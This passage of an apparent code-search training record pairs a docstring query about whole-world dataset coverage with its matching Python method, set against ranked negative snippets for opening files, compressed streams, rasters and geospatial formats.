\"A\":\r\n\r\n xp = np.arange(Nx)\r\n yp = np.arange(Ny)\r\n\r\n (Xp, Yp) = np.meshgrid(xp,yp)\r\n\r\n X = trans[0] + (Xp+0.5)*trans[1] + (Yp+0.5)*trans[2] #FIXME: bottleneck!\r\n Y = trans[3] + (Xp+0.5)*trans[4] + (Yp+0.5)*trans[5]\r\n\r\n if metaData == \"P\":\r\n\r\n xp = np.arange(Nx)\r\n yp = np.arange(Ny)\r\n\r\n (Xp, Yp) = np.meshgrid(xp,yp)\r\n\r\n X = trans[0] + Xp*trans[1] + Yp*trans[2] #FIXME: bottleneck!\r\n Y = trans[3] + Xp*trans[4] + Yp*trans[5]\r\n\r\n band = file.GetRasterBand(1)\r\n\r\n Z = band.ReadAsArray()\r\n\r\n dx = np.abs(dx)\r\n dy = np.abs(dy)\r\n\r\n return X, Y, Z, dx, dy, proj", "def open_gzipped(infile, mode='rt'):\n import gzip\n import bz2\n if mode.startswith('r'):\n tmode = 'rt'\n bmode = 'r'\n elif mode.startswith('w'):\n tmode = 'wt'\n bmode = 'w'\n elif mode.startswith('a'):\n tmode = 'at'\n bmode = 'a'\n if hasattr(infile, 'write'):\n return infile\n if isinstance(infile, str):\n if infile.endswith('.gz'):\n return gzip.open(infile, tmode)\n if infile.endswith('.bz2'):\n if hasattr(bz2, 'open'):\n return bz2.open(infile, tmode)\n else:\n return bz2.BZ2File(infile, bmode)\n return open(infile, tmode)", "def open(self, file):\n\n # Check if file exists\n if not os.path.exists(file):\n logging.warning(f'{file} does not exist')\n return\n try:\n # Open nx file\n self.file.load(file)\n except:\n logging.exception(f'Unable to open {file}')", "def _initialize_geospatial_data(self):\n driver = ogr.GetDriverByName(\"ESRI Shapefile\")\n\n bnd_src = driver.Open(self._spatial_filename, 0)\n bnd_lyr = bnd_src.GetLayer()\n (self.spatial_index,\n self.spatial_feats,\n self.bison_spatial_fields\n ) = self._create_spatial_index(bnd_lyr)", "def open_file(file_name):\n pass", "def open(self, filename):\n raise NotImplementedError", "def openFile(file):\n file = file.lower()\n if file.endswith('.bz2'):\n return bz2.BZ2File(file)\n elif file.endswith('.gz'):\n return gzip.open(file)\n return open(file)", "def read_gfs_data(fname, lat, lon, interp=None, step=200.):\n pass", "def fileopen(file):\n return _posixfile_().fileopen(file)", "def geogrid_from_gdalInMem(ds):\n in_data = ds.GetRasterBand(1).ReadAsArray()\n in_xdim = ds.RasterXSize\n in_ydim = ds.RasterYSize\n in_geotransform = ds.GetGeoTransform()\n in_xvals = np.linspace(\n in_geotransform[0] + 0.5 * in_geotransform[1],\n in_geotransform[0] + (in_xdim - 0.5) * in_geotransform[1],\n in_xdim)\n in_yvals = np.linspace(\n in_geotransform[3] + 0.5 * in_geotransform[5],\n in_geotransform[3] + (in_ydim - 0.5) * in_geotransform[5],\n in_ydim)\n in_wkt = ds.GetProjection()\n\n return GeoGrid(in_data, in_xvals, in_yvals, in_wkt, warn=True)", "def load(filename):\n return GesFile(filename)", "def geogrid_as_gdalInMem(gg):\n in_xdim = len(gg.x)\n in_ydim = len(gg.y)\n in_datatype = get_gdal_datatype(gg.data_array.dtype)\n in_geotransform = gg.geotransform\n in_wkt = gg.wkt\n in_data = gg.data_array\n\n ds = gdal.GetDriverByName('MEM').Create(\n '', in_xdim, in_ydim, 1, in_datatype)\n ds.SetProjection(in_wkt)\n ds.SetGeoTransform(in_geotransform)\n ds.GetRasterBand(1).WriteArray(in_data)\n\n return ds", "def load_from_file(path, bands):\n dataset = gdal.Open(path, gdal.GA_ReadOnly)\n array = dataset.ReadAsArray()\n\n if len(array.shape) == 3:\n # The bands column is in the first position, but we want it last\n array = np.rollaxis(array, 0, 3)\n elif len(array.shape) == 2:\n # This image seems to have one band, so we add an axis for ease\n # of use in the rest of the library\n array = array[:, :, np.newaxis]\n\n image = array.astype('float32')\n\n return SatelliteImage(dataset, image, bands)", "def _open(self, file_path=None):\n\t\tif file_path is None:\n\t\t\tfile_path = self.file_path\n\n\t\tif not os.path.exists(file_path):\n\t\t\traise ValueError('Could not find file: {}'.format(file_path))\n\n\t\ttry:\n\t\t\tf = open(file_path, encoding='utf-8', newline='')\n\t\texcept OSError as err:\n\t\t\tself.log.error(str(err))\n\t\t\traise ValueError('Could not open file: {}'.format(file_path))\n\n\t\treturn f", "def read(self, as_numpy_array=False, as_single_band=True,\n old_nodata=None, new_nodata=None, epsg=None):\n if self.ext not in formats.RASTER:\n raise UnsupportedFormatException(\n \"Only the following raster formats are supported: {}\".format(\n ','.join(formats.RASTER)\n )\n )\n self.basename = os.path.basename(self.uri)\n if not self.data:\n self.data = gdal.Open(self.uri)\n out_data = self.data\n if epsg and self.get_epsg() != epsg:\n out_data = reproject(self.data, epsg)\n\n if as_numpy_array:\n return raster_to_numpy_array(out_data, as_single_band,\n old_nodata, new_nodata)\n else:\n return out_data", "def ReadRaster(cls,infile):\r\n try:\r\n import gdal\r\n import rasterio\r\n except:\r\n raise ImportError(\"Can not import module GDAL or RasterIO\")\r\n\r\n with rasterio.open(infile) as src:\r\n transform = src.meta['transform']\r\n nBands = (src.indexes)\r\n array = src.read_band(1)\r\n return array\r\n #except:\r\n # raise ImportError(\"Can not read band\")\r", "def readfile(filename, encoding=None, legacy_mode=False):\n if not is_dxf_file(filename):\n raise IOError(\"File '{}' is not a DXF file.\".format(filename))\n\n info = dxf_file_info(filename)\n with io.open(filename, mode='rt', encoding=info.encoding, errors='ignore') as fp:\n dwg = read(fp, legacy_mode=legacy_mode, dxfversion=info.version)\n\n dwg.filename = filename\n if encoding is not None and is_supported_encoding(encoding):\n dwg.encoding = encoding\n return dwg", "def open(self, infile, cache=True):\n return _image.image_open(self, infile, cache)", "def open(self, path, mode='r', encoding=None, newline=None):\n return DataSource.open(self, self._fullpath(path), mode,\n encoding=encoding, newline=newline)", "def _load_file(self, XYZ_path, bohrs=False):\n\n # Imports\n import numpy as np\n from .const import CIC, PHYS, atom_num, atom_sym\n from .error import XYZError\n from .utils import safe_cast as scast\n\n # Complain if already initialized\n if 'geoms' in dir(self):\n raise XYZError(XYZError.OVERWRITE,\n \"Cannot overwrite contents of existing OpanXYZ\", \"\")\n ## end if\n\n # Open file, read contents, close stream\n # No particular exception handling; that will be the responsibility\n # of the calling routine.\n # May want to add a check for text file format; but, really, a check\n # for no-found-geometry-information will likely cover such a case.\n with open(XYZ_path,'rU') as in_fl:\n self.XYZ_path = XYZ_path #: Path of file\n self.in_str = in_fl.read()\n\n # Check to ensure at least one geom match; else raise some sort of\n # error\n if not OpanXYZ.p_geom.search(self.in_str):\n raise XYZError(XYZError.XYZFILE,\n \"No valid geometry found\",\n \"XYZ file: \" + XYZ_path)\n ## end if\n\n # Store the number of atoms. XYZ files with multiple geometries will\n # be required to have the same number of atoms in all geometries.\n # This is fine for Open Anharmonic, but may be highly undesirable\n # in other applications. Beware.\n # If the .match() call doesn't have a group attribute, catch the\n # resulting AttributeError and throw an XYZError. Can't think of any\n # other situation that would throw an AttributeError here, so probably\n # I don't have to check for a subtype of AttributeError...\n # Can't think of a need for an else or a finally here\n try:\n self.num_atoms = scast(OpanXYZ.p_geom.match(self.in_str)\n .group(\"num\"), np.int_)\n except AttributeError:\n raise XYZError(XYZError.XYZFILE,\n \"No geometry block found at start of file\",\n \"XYZ file: \" + XYZ_path)\n ## end try\n\n # Initialize the description vector and geometry array\n # CANNOT use matrix type for the geometry since it's 3D.\n # Retriever function for geometry should convert the given slice\n # to a vector as an np.matrix, though.\n # Geometry is constructed as a length-3N vector of\n # coordinates, where atom 1's x/y/z coordinates are sequential,\n # then atom 2's x/y/z coordinates are sequential, etc.\n # Multiple geometries in a single XYZ file are stacked in a simple\n # array.\n self.descs = []\n self.geoms = []\n\n # Initialize the atom symbols vector\n self.atom_syms = []\n\n # Define a counter for the number of geometries. Store as a persistent\n # instance variable because it will be useful later.\n self.num_geoms = 0\n\n # Loop over the geometry blocks found in the input file\n for mch in OpanXYZ.p_geom.finditer(self.in_str):\n # Check that the number of atoms is consistent with the spec\n # found in the first geometry block\n if not scast(mch.group(\"num\"), np.int_) == self.num_atoms:\n raise XYZError(XYZError.XYZFILE,\n \"Non-constant number of atoms in multiple geometry\",\n \"XYZ file: \" + XYZ_path)\n ## end if\n\n # Store the description for the current geometry\n self.descs.append(mch.group(\"desc\"))\n\n # Assemble the coordinates vector and assemble/check the element\n # ID vector.\n # Reset the atom counter and the coordinates vector\n atom_count = 0\n coord_vec = np.empty((0,),dtype=np.float_)\n for line_mch in OpanXYZ.p_coords.finditer(mch.group(\"coord\")):\n # Check for whether element list has been fully populated\n if len(self.atom_syms) < self.num_atoms:\n # If not, continue populating it; have to check for\n # whether it's an atomic number or an element symbol\n if line_mch.group(\"el\").isdigit():\n # Atomic number\n # Check for valid number\n at_num = scast(line_mch.group(\"el\"), np.int_)\n if not (CIC.MIN_ATOMIC_NUM <= at_num\n <= CIC.MAX_ATOMIC_NUM):\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unsupported element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ##end if\n\n # Tag on the new symbol\n self.atom_syms.append(atom_sym[at_num])\n else:\n # Element symbol; store as all caps\n # Check for valid element, first by catching if the\n # specified element string is even valid\n try:\n at_num = atom_num[line_mch.group(\"el\").upper()]\n except KeyError:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unrecognized element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end try\n\n # Tag on the new symbol\n self.atom_syms.append(line_mch.group(\"el\").upper())\n ## end if\n else: # List is fully populated\n # If so, confirm that the element specified at the current\n # line matches that of the first geometry of the file\n # Have to check whether it's an atomic number or symbol.\n if line_mch.group(\"el\").isdigit():\n # Atomic number; don't need safe cast; must trap for\n # a bad atomic number\n at_num = scast(line_mch.group(\"el\"), np.int_)\n if not (CIC.MIN_ATOMIC_NUM <= at_num\n <= CIC.MAX_ATOMIC_NUM):\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unsupported element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n if not atom_sym[at_num] == self.atom_syms[atom_count]:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is inconsistent \\\n with geometry #0\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n\n else:\n # Element symbol\n # Check for valid element, first by catching if the\n # specified element string is even valid\n try:\n at_num = atom_num[line_mch.group(\"el\").upper()]\n except KeyError:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is an \\\n unrecognized element\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end try\n # Confirm symbol matches the initial geometry\n if not line_mch.group(\"el\").upper() == \\\n self.atom_syms[atom_count]:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0}, atom #{1} is inconsistent \\\n with geometry #0\"\n .format(self.num_geoms, atom_count),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n ## end if\n ## end if\n\n # Append the three coordinates of the current atom to the\n # temp coordinates vector, converting to Bohrs if indicated.\n # Working in Bohrs is desired because they are atomic units\n # and thus are part of the internal unit definition of the\n # Hartree.\n for c_str in range(1,4):\n coord_vec = np.concatenate(\n (coord_vec, [\n scast(line_mch.group(\"c{0}\".format(c_str)), np.float_) /\n (1.0 if bohrs else PHYS.ANG_PER_BOHR)\n ]), axis=0)\n ## next c_str\n\n # Increment the atom_count for the atom number\n atom_count += 1\n\n ## next line_mch\n\n # Confirm that number of imported coordinates matches the\n # number expected from self.num_atoms\n if not coord_vec.shape[0] == 3*self.num_atoms:\n raise XYZError(XYZError.XYZFILE,\n \"Geometry #{0} atom count is inconsistent\"\n .format(self.num_geoms),\n \"XYZ file: {0}\".format(XYZ_path))\n ## end if\n\n # Assemble the coordinates vector into the actual coordinates\n # stack for the XYZ\n self.geoms.append(coord_vec)\n\n # Increment the count of the number of geometries. Once the\n # 'mch' iteration is completed, this will accurately reflect\n # the number of geometries read from the file.\n self.num_geoms += 1\n\n ## next mch", "def create_dat_from_csv(windgrid_file, DAT_header, output_file, wind_field='gust_mph', latitude_field='lat', longitude_field='lon'):\n df = pd.read_csv(windgrid_file)\n df['geometry'] = [Point(x, y) for x, y in zip(\n df[longitude_field], df[latitude_field])]\n gdf = gpd.GeoDataFrame(df, geometry='geometry')\n create_dat_from_geodataframe(\n gdf, DAT_header, output_file, wind_field=wind_field)", "def read_from(self, filename):\n\n lon, lat, field, weight = [], [], [], []\n\n if os.path.exists(filename):\n logger.info(\"Reading data from file {0}\".format(filename))\n with open(filename, 'r') as f:\n line = f.readline()\n ncols = len(line.split())\n while ncols >= 3:\n lon.append(float(line.split()[0]))\n lat.append(float(line.split()[1]))\n field.append(float(line.split()[2]))\n if ncols >= 4:\n weight.append(float(line.split()[3]))\n else:\n weight.append(1.)\n line = f.readline()\n ncols = len(line.split())\n\n self.x = np.array(lon)\n self.y = np.array(lat)\n self.field = np.array(field)\n self.weight = np.array(weight)\n return self\n else:\n logger.error(\"File {0} does not exist\".format(filename))\n raise FileNotFoundError('File does not exist')", "def open_gz(filename, mode):\n return gzip.open(filename, mode)", "def readArray(input):\n data = gdal.Open(input)\n band = data.GetRasterBand(1)\n \n return band.ReadAsArray()", "def cli(source_f, raster_f, output, verbose):\n with fiona.open(source_f, 'r') as source:\n source_driver = source.driver\n source_crs = source.crs\n sink_schema = source.schema.copy()\n\n source_geom = source.schema['geometry']\n if source_geom == 'Point':\n sink_schema['geometry'] = '3D Point'\n elif source_geom == 'LineString':\n sink_schema['geometry'] = '3D LineString'\n elif source_geom == '3D Point' or source_geom == '3D LineString':\n pass\n else:\n click.BadParameter(\"Source geometry type {} not implemented\".format(source_geom))\n\n with rasterio.open(raster_f) as raster:\n if source_crs != raster.crs:\n click.BadParameter(\"Features and raster have different CRS.\")\n if raster.count > 1:\n warnings.warn(\"Found {0} bands in {1}, expected a single band raster\".format(raster.bands, raster_f))\n supported = ['int16', 'int32', 'float32', 'float64']\n if raster.dtypes[0] not in supported:\n warnings.warn(\"Found {0} type in {1}, expected one of {2}\".format(raster.dtypes[0], raster_f, supported))\n with fiona.open(\n output, 'w',\n driver=source_driver,\n crs=source_crs,\n schema=sink_schema) as sink:\n\n for feature in source:\n try:\n feature_z = drapery.drape(raster, feature)\n sink.write({\n 'geometry': mapping(feature_z),\n 'properties': feature['properties'],\n })\n except Exception:\n logging.exception(\"Error processing feature %s:\", feature['id'])\n #print(sink.closed)\n #print(raster.closed)\n #print(source.closed)", "def read_file(netcdf_file_name):\n\n dataset_object = netCDF4.Dataset(netcdf_file_name)\n\n saliency_dict = {\n MODEL_FILE_KEY: str(getattr(dataset_object, MODEL_FILE_KEY)),\n IS_LAYER_OUTPUT_KEY: bool(getattr(dataset_object, IS_LAYER_OUTPUT_KEY)),\n LAYER_NAME_KEY: str(getattr(dataset_object, LAYER_NAME_KEY)),\n NEURON_INDICES_KEY: numpy.array(\n getattr(dataset_object, NEURON_INDICES_KEY), dtype=int\n ),\n IDEAL_ACTIVATION_KEY: getattr(dataset_object, IDEAL_ACTIVATION_KEY),\n MULTIPLY_BY_INPUT_KEY:\n bool(getattr(dataset_object, MULTIPLY_BY_INPUT_KEY)),\n VALID_TIMES_KEY: numpy.array(\n dataset_object.variables[VALID_TIMES_KEY][:], dtype=int\n ),\n LATITUDES_KEY: numpy.array(\n dataset_object.variables[LATITUDES_KEY][:], dtype=float\n ),\n LONGITUDES_KEY: numpy.array(\n dataset_object.variables[LONGITUDES_KEY][:], dtype=float\n ),\n SALIENCY_MATRIX_KEY: numpy.array(\n dataset_object.variables[SALIENCY_MATRIX_KEY][:], dtype=float\n )\n }\n\n dataset_object.close()\n return saliency_dict", "def get_infile(filename):\r\n if filename.endswith(\".gz\"):\r\n fin = GzipFile(filename, \"rb\")\r\n else:\r\n fin = open(filename, \"U\")\r\n return fin", "def get_infile(filename):\r\n if filename.endswith(\".gz\"):\r\n fin = GzipFile(filename, \"rb\")\r\n else:\r\n fin = open(filename, \"U\")\r\n return fin", "def open_input_file(input_file):\n if input_file:\n if not os.path.isfile(input_file):\n sys.stderr.write(\n \"ERROR! Input file (%s) is not a normal file.\\n\" % input_file)\n sys.exit(1)\n try:\n return codecs.open(input_file, \"r\", \"utf8\")\n except:\n sys.stderr.write(\n \"ERROR! Could not open input file (%s) for reading:\\n\" % input_file)\n raise\n else:\n return sys.stdin", "def open_local_or_gcs(path, mode):\n if path.startswith('gs://'):\n try:\n return gcsio.GcsIO().open(path, mode)\n except Exception as e: # pylint: disable=broad-except\n # Currently we retry exactly once, to work around flaky gcs calls.\n logging.error('Retrying after exception reading gcs file: %s', e)\n time.sleep(10)\n return gcsio.GcsIO().open(path, mode)\n else:\n return open(path, mode)", "def import_L1B(cls,infile):\r\n try:\r\n import gdal\r\n import rasterio\r\n except:\r\n raise ImportError(\"Can not import module GDAL or RasterIO\")\r\n\r\n\r\n image=image()\r\n\r\n #except:\r\n # raise ImportError(\"Can not read band\")\r", "def open_file(file_path, mode='rb', encoding='iso-8859-1'):\n try:\n return open(file_path, mode=mode, encoding=encoding)\n except IOError:\n raise", "def file_open(*args, **kwargs):\n return open(*args, **kwargs)", "def open_file(self, path, omode=\"r\"):\n self.root_group = netCDF4.Dataset(path, omode)\n return self.root_group", "def open_(filename, *args):\n\n if (filename[-3:] == '.gz'):\n return gzip.open(filename, *args)\n try:\n return open(filename, *args)\n except OSError:\n return gzip.open(filename + \".gz\", *args)", "def open(path, mode='r', destpath=os.curdir, encoding=None, newline=None):\n\n ds = DataSource(destpath)\n return ds.open(path, mode, encoding=encoding, newline=newline)", "def open_file(path, config):\n\n return fopen(normalize_path(path, config))", "def openInputFile(infile, *args):\n if infile is None:\n logging.info(\"Reading input from STDIN\")\n return sys.stdin\n\n if isinstance(infile, str):\n if urlRE.match(infile):\n import urllib2\n return urllib2.urlopen(infile)\n if len(infile)>3 and infile[-3:]=='.gz':\n import gzip\n return gzip.GzipFile(infile,'rb')\n elif len(infile)>4 and infile[-4:]=='.bz2':\n import bz2\n return bz2.BZ2File(infile,'rb')\n else:\n return open(infile,'rt')\n else:\n return infile", "def open_input_stream(uri: str) -> BinaryIO:\n parsed = urlparse(uri)\n if parsed.scheme == \"gs\":\n return _gcsfs().open(uri)\n else:\n filesystem, path = fs.FileSystem.from_uri(uri)\n return filesystem.open_input_file(path)", "def read(self, format=None, epsg=None):\n if not format:\n format = self.default_output\n if self.data is None and self.features:\n if type(self.features) == str:\n self.features = json.loads(self.features)\n features = self.features\n\n if 'type' in features and features['type'] == 'FeatureCollection':\n self.data = geopandas.GeoDataFrame.from_features(\n self.features['features'])\n else:\n self.data = geopandas.GeoDataFrame.from_features(features)\n if not self.data.crs:\n if hasattr(self, 'crs'):\n self.data.crs = self.crs\n else:\n self.get_epsg()\n\n return self.transform_data(outformat=format, epsg=epsg)", "def import_national_boundaries(self, name):\n print \"\\n4.3- importa shape con confini nazionali ISTAT\"\n countrySHP = os.path.join(\"boundaries\", \"italy_2011_WGS84.shp\")\n countrySQL = os.path.join(\"boundaries\", \"italy_%s.sql\" % name)\n if os.path.isfile(countrySQL):\n call(\"rm %s\" % countrySQL, shell=True)\n cmd = \"shp2pgsql -s 4326 -W 'LATIN1' %s italy %s > %s\" % (countrySHP, name, countrySQL)\n print cmd\n call(cmd, shell=True)\n call(\"psql -h localhost -U %s -d %s -f %s\" % (self.user, name, countrySQL), shell=True)\n call(\"rm %s\" % countrySQL, shell=True)\n call(\"echo 'CREATE INDEX ON italy USING GIST (geom);'| psql -U %s -d %s\" % (self.user, name), shell=True)\n call(\"echo 'ANALYZE italy;'| psql -U %s -d %s\" % (self.user, name), shell=True)", "def convert(threshold, infile, tmpfile_1, tmpfile_2, outfile):\n args = [\n \"gdal_calc.py\",\n '-A', infile,\n '--outfile={}'.format(tmpfile_1),\n '--calc=logical_and(A>={}, A<999)'.format(threshold),\n '--type=Byte', '--NoDataValue=0',\n '--co=SPARSE_OK=YES',\n '--co=NBITS=1',\n '--quiet'\n # Could enable compression\n # --co=\"COMPRESS=LZW\"\n ]\n subprocess.run(args)\n\n subprocess.run([\n \"gdal_polygonize.py\",\n tmpfile_1,\n '-q',\n '-f', 'ESRI Shapefile',\n tmpfile_2\n ])\n\n subprocess.run([\n \"ogr2ogr\",\n '-a_srs', 'EPSG:4326',\n outfile,\n tmpfile_2\n ])\n\n subprocess.run([\"rm\", tmpfile_1])\n subprocess.run([\"rm\", tmpfile_2])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'shx')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'dbf')])\n subprocess.run([\"rm\", tmpfile_2.replace('shp', 'prj')])", "def load_gldas_elevation_dataset(gldas_elevation_file): \n d1 = xr.open_dataset(gldas_elevation_file).load()\n return d1", "def genOpen(filename, mode):\n (name, ext) = os.path.splitext(filename)\n if ext == \".gz\":\n return gzip.open(filename, mode)\n else:\n return open(filename, mode)", "def genOpen(filename, mode):\n (name, ext) = os.path.splitext(filename)\n if ext == \".gz\":\n return gzip.open(filename, mode)\n else:\n return open(filename, mode)", "def open_(filename, mode=None, compresslevel=9):\n if filename[-3:] == '.gz':\n if mode is None: mode = 'rt'\n return closing(gzip.open(filename, mode, compresslevel))\n else:\n if mode is None: mode = 'r'\n return open(filename, mode)", "def from_file(path):\n\n filename = os.path.basename(path)\n\n base, suffix = os.path.splitext(filename);\n\n if suffix == '.bin':\n g = bgy3d.from_file(path)\n elif suffix == '.m':\n g = contf.m2dat(path)\n else:\n print 'Unknown file suffix.'\n exit()\n\n return g", "def load_surfer(fname, fmt='ascii'):\n assert fmt in ['ascii', 'binary'], \"Invalid grid format '%s'. Should be \\\n 'ascii' or 'binary'.\" % (fmt)\n if fmt == 'ascii':\n # Surfer ASCII grid structure\n # DSAA Surfer ASCII GRD ID\n # nCols nRows number of columns and rows\n # xMin xMax X min max\n # yMin yMax Y min max\n # zMin zMax Z min max\n # z11 z21 z31 ... List of Z values\n with open(fname) as ftext:\n # DSAA is a Surfer ASCII GRD ID\n id = ftext.readline()\n # Read the number of columns (ny) and rows (nx)\n ny, nx = [int(s) for s in ftext.readline().split()]\n shape = (nx, ny)\n # Read the min/max value of columns/longitue (y direction)\n ymin, ymax = [float(s) for s in ftext.readline().split()]\n # Read the min/max value of rows/latitude (x direction)\n xmin, xmax = [float(s) for s in ftext.readline().split()]\n area = (xmin, xmax, ymin, ymax)\n # Read the min/max value of grid values\n datamin, datamax = [float(s) for s in ftext.readline().split()]\n data = numpy.fromiter((float(i) for line in ftext for i in\n line.split()), dtype='f')\n data = numpy.ma.masked_greater_equal(data, 1.70141e+38)\n assert numpy.allclose(datamin, data.min()) \\\n and numpy.allclose(datamax, data.max()), \\\n \"Min and max values of grid don't match ones read from file.\" \\\n + \"Read: ({}, {}) Actual: ({}, {})\".format(\n datamin, datamax, data.min(), data.max())\n # Create x and y coordinate numpy arrays\n x, y = regular(area, shape)\n if fmt == 'binary':\n raise NotImplementedError(\n \"Binary file support is not implemented yet.\")\n return x, y, data, shape", "def convertCSVToGeoTIFF(geoproperties, datafile, outputdir, outfile):\n \n data = numpy.genfromtxt(datafile, delimiter=',')\n \n Ny, Nx = data.shape\n \n #print data.size\n #print data.shape\n #print data\n \n # slice out the last column of null values\n if str(data[Ny-1][Nx-1]) == 'nan':\n data = data[:,:-1]\n \n Ny, Nx = data.shape\n \n #print data.size\n #print data.shape\n #print data\n #print Ny, Nx\n \n startPos = [geoproperties['tl']['long'],geoproperties['tl']['lat']]\n d_lat = (geoproperties['br']['lat'] - geoproperties['tl']['lat']) / (Ny - 1)\n d_long = (geoproperties['br']['long'] - geoproperties['tl']['long']) / (Nx - 1)\n \n #print startPos, d_lat, d_long\n \n driver = gdal.GetDriverByName(\"GTiff\")\n ds = driver.Create(os.path.join(outputdir,outfile),Nx,Ny,1,gdal.GDT_Float32)\n #ds = driver.Create('output/output.tif',Nx,Ny,1,gdal.GDT_Byte)\n #ds.SetGeoTransform( [ -158.584, .008, 0, 21.108, 0, .008 ] )\n ds.SetGeoTransform( [ startPos[0], d_long, 0, startPos[1], 0, d_lat ] )\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n ds.SetProjection( srs.ExportToWkt() )\n ds.GetRasterBand(1).WriteArray(data)\n ds = None", "def open_file(self, path: str, **kwargs) -> OpenFileType:\n full_path = self._full_path(path)\n logger.debug(f\"returning open file for {full_path}\")\n return self.fs.open(full_path, **kwargs)", "def smart_open(filename: str, mode: str = \"rt\", ftype: str = \"auto\", errors: str = \"replace\"):\n if ftype == \"gzip\" or ftype == \"gz\" or (ftype == \"auto\" and filename.endswith(\".gz\")):\n return gzip.open(filename, mode=mode, encoding=\"utf-8\", errors=errors)\n else:\n return open(filename, mode=mode, encoding=\"utf-8\", errors=errors)", "def _open_file(self,path):\n \n print \"Open File %s\" % path\n \n mapping = self.mappings.GetClientData(self.mappings.GetSelection())\n try:\n delimiter=mapping['_params']['delimiter']\n except:\n delimiter=','\n try:\n skip_last=mapping['_params']['skip_last']\n except:\n skip_last=0\n self.grid_table = SimpleCSVGrid(path,delimiter,skip_last)\n self.grid.SetTable(self.grid_table)\n\tself.opened_path = path", "def open_input_files(self):\n self.dictionaryFile = open(self.dictionaryFile, 'r', encoding=self.encoding)\n\n if self.annotationFile :\n self.annotationFile = open(self.annotationFile, 'r', encoding=self.encoding)\n elif self.annotationFile is None:\n try:\n self.annotationFile = open(os.path.join(self.dictionaryPath, self.dictionaryName + '.ann'), 'r', encoding=self.encoding)\n except FileNotFoundError:\n if self.verbose >= 2:\n sys.stdout.write (\"Warning: annotation file is not found.\\n\")\n\n if self.abbreviationsFile :\n self.abbreviationsFile = open(self.abbreviationsFile, 'r', encoding=self.encoding)\n elif self.abbreviationsFile is None:\n try:\n self.abbreviationsFile = open(os.path.join(self.dictionaryPath, self.dictionaryName + '_abrv.dsl'), 'r', encoding=self.encoding)\n except FileNotFoundError:\n if self.verbose >= 2:\n sys.stdout.write (\"Warning: abbreviations file is not found.\\n\")", "def get_data(datapath, asfile=False):\n import os\n\n ## The file is a local file - try to get it\n if not os.path.isfile(datapath) :\n print \"The file %s you are trying to access does not exist\" %(datapath)\n raise IOError\n fn = datapath\n if asfile:\n return open(fn)\n else:\n import numpy as np\n return np.loadtxt(fn)", "def convert_gpkg_to_geojson(self,shape_fname, destdirectory):\r\n\t\tfeatures = []\r\n\t\tcrs = None\r\n\t\tif not os.path.isfile(shape_fname):\r\n\t\t\tself.logger.error('File not found: %s' % shape_fname)\r\n\t\tself.opstatus.add_info(stage=6, msg = \"Rounding coordinates to six decimal precision\")\r\n\r\n\r\n\t\tout_fname = os.path.join(destdirectory,os.path.basename(shape_fname).replace('.gpkg', '.geojson'))\r\n\t\twith fiona.open(shape_fname, driver='GPKG') as source:\r\n\t\t\twith fiona.open(out_fname, \"w\",driver='GeoJSON',crs = fiona.crs.from_epsg(4326),schema=source.schema) as sink:\r\n\t\t\t\tfor rec in source:\r\n\t\t\t\t\tsink.write(rec)\r\n\r\n\t\tself.logger.info('file written: %s' % out_fname)\r\n\t\tself.opstatus.set_status(stage=6, status=1, statustext =\"File successfully converted to GeoJSON with six decimal precision\")\r\n\t\tself.opstatus.add_success(stage=6, msg = \"GeoJSON file successfully written\")\r\n\t\treturn out_fname" ]
[ "0.67583877", "0.6669646", "0.6662748", "0.6427024", "0.5995178", "0.57921493", "0.5738032", "0.5566471", "0.5458556", "0.5453362", "0.5418001", "0.5346144", "0.5346144", "0.5330134", "0.52282006", "0.52168894", "0.5216014", "0.5212678", "0.5209175", "0.51660335", "0.5159364", "0.5139224", "0.5109491", "0.5063188", "0.5039358", "0.50391394", "0.5036992", "0.5032136", "0.49825037", "0.49768433", "0.49634218", "0.49291316", "0.49258372", "0.49227995", "0.49173376", "0.48916772", "0.48818195", "0.4878031", "0.48741856", "0.48651612", "0.4848519", "0.4846156", "0.4844945", "0.48447692", "0.48424593", "0.48284596", "0.48215058", "0.48200557", "0.48179197", "0.47830737", "0.4771", "0.47534102", "0.47239733", "0.47052342", "0.47002077", "0.46981978", "0.46945617", "0.46943188", "0.46895388", "0.46886396", "0.46577543", "0.46577388", "0.4653829", "0.46536294", "0.46345222", "0.46340176", "0.46242735", "0.46226275", "0.46201566", "0.46136242", "0.4609307", "0.46048144", "0.46048144", "0.46027505", "0.4596128", "0.45946392", "0.4592517", "0.45831355", "0.45733684", "0.45672545", "0.45659703", "0.4560109", "0.45539266", "0.45529532", "0.45514315", "0.45399165", "0.45339638", "0.4533894", "0.45324218", "0.45324218", "0.45311448", "0.45118484", "0.45111206", "0.45072922", "0.4507189", "0.45051438", "0.4503528", "0.44913948", "0.44837382", "0.44752026" ]
0.62465745
4
Returns whether the dataset covers the whole world or not.
def IsWholeWorld(self, resolution=None): if resolution is None: resolution = self.GetNativeResolution() spatial_ref = self.GetSpatialReference() world_extents = spatial_ref.GetWorldExtents() extents = self.GetExtents() ll_offset = world_extents.lower_left - extents.lower_left ur_offset = world_extents.upper_right - extents.upper_right pixel_sizes = spatial_ref.GetPixelDimensions(resolution=resolution) return (abs(ll_offset.x) <= pixel_sizes.x and abs(ll_offset.y) <= pixel_sizes.y and abs(ur_offset.x) <= pixel_sizes.x and abs(ur_offset.y) <= pixel_sizes.y)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
